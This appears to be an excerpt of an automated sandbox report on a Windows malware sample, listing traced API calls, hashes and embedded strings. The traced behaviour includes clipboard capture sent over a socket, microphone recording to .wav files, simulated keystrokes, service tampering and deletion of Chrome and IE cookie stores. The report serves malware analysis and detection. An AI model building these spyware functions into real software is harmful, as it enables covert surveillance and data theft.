                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                            • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: InputSend
                            • String ID:
                            • API String ID: 3431551938-0
                            • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                            • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
                            • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                            • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
                            APIs
                            • OpenClipboard.USER32 ref: 00414F41
                            • EmptyClipboard.USER32 ref: 00414F4F
                            • CloseClipboard.USER32 ref: 00414F55
                            • OpenClipboard.USER32 ref: 00414F5C
                            • GetClipboardData.USER32(0000000D), ref: 00414F6C
                            • GlobalLock.KERNEL32(00000000), ref: 00414F75
                            • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                            • CloseClipboard.USER32 ref: 00414F84
                              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                            • String ID:
                            • API String ID: 2172192267-0
                            • Opcode ID: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
                            • Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
                            • Opcode Fuzzy Hash: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
                            • Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A
                            APIs
                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                            • __fassign.LIBCMT ref: 00447814
                            • __fassign.LIBCMT ref: 0044782F
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                            • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                            • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                            • String ID:
                            • API String ID: 1324828854-0
                            • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                            • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
                            • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                            • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID: $-E$$-E
                            • API String ID: 269201875-3140958853
                            • Opcode ID: e48a72c45575700ceddfc4a13269a7974e50b6c85b9f24d2dc50821f03aae928
                            • Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
                            • Opcode Fuzzy Hash: e48a72c45575700ceddfc4a13269a7974e50b6c85b9f24d2dc50821f03aae928
                            • Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A
                            APIs
                            • _strftime.LIBCMT ref: 00401D30
                              • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                            • waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
                            • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
                            • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                            • String ID: %Y-%m-%d %H.%M$.wav
                            • API String ID: 3809562944-3597965672
                            • Opcode ID: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
                            • Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
                            • Opcode Fuzzy Hash: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
                            • Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E
                            APIs
                              • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                              • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                              • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
                            • PathFileExistsA.SHLWAPI(?), ref: 0040AEB9
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                            • API String ID: 1133728706-4073444585
                            • Opcode ID: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
                            • Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
                            • Opcode Fuzzy Hash: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
                            • Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                            • Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
                            • Opcode Fuzzy Hash: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                            • Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269
                            APIs
                              • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                            • _free.LIBCMT ref: 0044E128
                              • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                              • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                            • _free.LIBCMT ref: 0044E133
                            • _free.LIBCMT ref: 0044E13E
                            • _free.LIBCMT ref: 0044E192
                            • _free.LIBCMT ref: 0044E19D
                            • _free.LIBCMT ref: 0044E1A8
                            • _free.LIBCMT ref: 0044E1B3
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                            • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
                            • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                            • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
                            APIs
                              • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                              • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                              • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                              • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
                            • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCurrentOpenProcessQueryValue
                            • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                            • API String ID: 1866151309-2070987746
                            • Opcode ID: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
                            • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
                            • Opcode Fuzzy Hash: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
                            • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA
                            APIs
                            • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                            • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastValue___vcrt_
                            • String ID:
                            • API String ID: 3852720340-0
                            • Opcode ID: a51cd608757b9cf21dde5cb3b99bb74488ace4818edb59339c74db540250a301
                            • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
                            • Opcode Fuzzy Hash: a51cd608757b9cf21dde5cb3b99bb74488ace4818edb59339c74db540250a301
                            • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
                            APIs
                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                            • GetLastError.KERNEL32 ref: 0040AA28
                            Strings
                            • [Chrome Cookies not found], xrefs: 0040AA42
                            • UserProfile, xrefs: 0040A9EE
                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                            • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteErrorFileLast
                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                            • API String ID: 2018770650-304995407
                            • Opcode ID: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                            • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
                            • Opcode Fuzzy Hash: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                            • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
                            APIs
                            • __allrem.LIBCMT ref: 00438A09
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                            • __allrem.LIBCMT ref: 00438A3C
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                            • __allrem.LIBCMT ref: 00438A71
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 1992179935-0
                            • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                            • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
                            • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                            • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
                            APIs
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: __cftoe
                            • String ID:
                            • API String ID: 4189289331-0
                            • Opcode ID: 6721aee484eec6af142a787e0ccbed3fea0baaedfcb9b8799baac12631cf5e23
                            • Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
                            • Opcode Fuzzy Hash: 6721aee484eec6af142a787e0ccbed3fea0baaedfcb9b8799baac12631cf5e23
                            • Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: __freea$__alloca_probe_16_free
                            • String ID: a/p$am/pm
                            • API String ID: 2936374016-3206640213
                            • Opcode ID: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                            • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
                            • Opcode Fuzzy Hash: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                            • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                            • int.LIBCPMT ref: 0040F8D7
                              • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                              • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                            • std::_Facet_Register.LIBCPMT ref: 0040F917
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                            • __Init_thread_footer.LIBCMT ref: 0040F97F
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                            • String ID:
                            • API String ID: 3815856325-0
                            • Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                            • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
                            • Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                            • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                            • String ID:
                            • API String ID: 493672254-0
                            • Opcode ID: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
                            • Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
                            • Opcode Fuzzy Hash: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
                            • Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9
                            APIs
                            • GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                            • _free.LIBCMT ref: 0044575C
                            • _free.LIBCMT ref: 00445784
                            • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                            • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                            • _abort.LIBCMT ref: 004457A3
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free$_abort
                            • String ID:
                            • API String ID: 3160817290-0
                            • Opcode ID: beb673fc776bdcf0cb4aa2f907b8faed87466b0c6696de81e80bb7a9f8cba6db
                            • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
                            • Opcode Fuzzy Hash: beb673fc776bdcf0cb4aa2f907b8faed87466b0c6696de81e80bb7a9f8cba6db
                            • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                            • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
                            • Opcode Fuzzy Hash: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                            • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
                            • Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
                            • Opcode Fuzzy Hash: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
                            • Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
                            • Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
                            • Opcode Fuzzy Hash: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
                            • Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                            • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                            • CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSizeSleep
                            • String ID: h G
                            • API String ID: 1958988193-3300504347
                            • Opcode ID: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                            • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
                            • Opcode Fuzzy Hash: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                            • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E
                            APIs
                            • RegisterClassExA.USER32(00000030), ref: 0041B310
                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                            • GetLastError.KERNEL32 ref: 0041B335
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ClassCreateErrorLastRegisterWindow
                            • String ID: 0$MsgWindowClass
                            • API String ID: 2877667751-2410386613
                            • Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                            • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
                            • Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                            • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
                            APIs
                            • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                              • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                            • _UnwindNestedFrames.LIBCMT ref: 00437631
                            • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                            • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                            • String ID: /zC
                            • API String ID: 2633735394-4132788633
                            • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
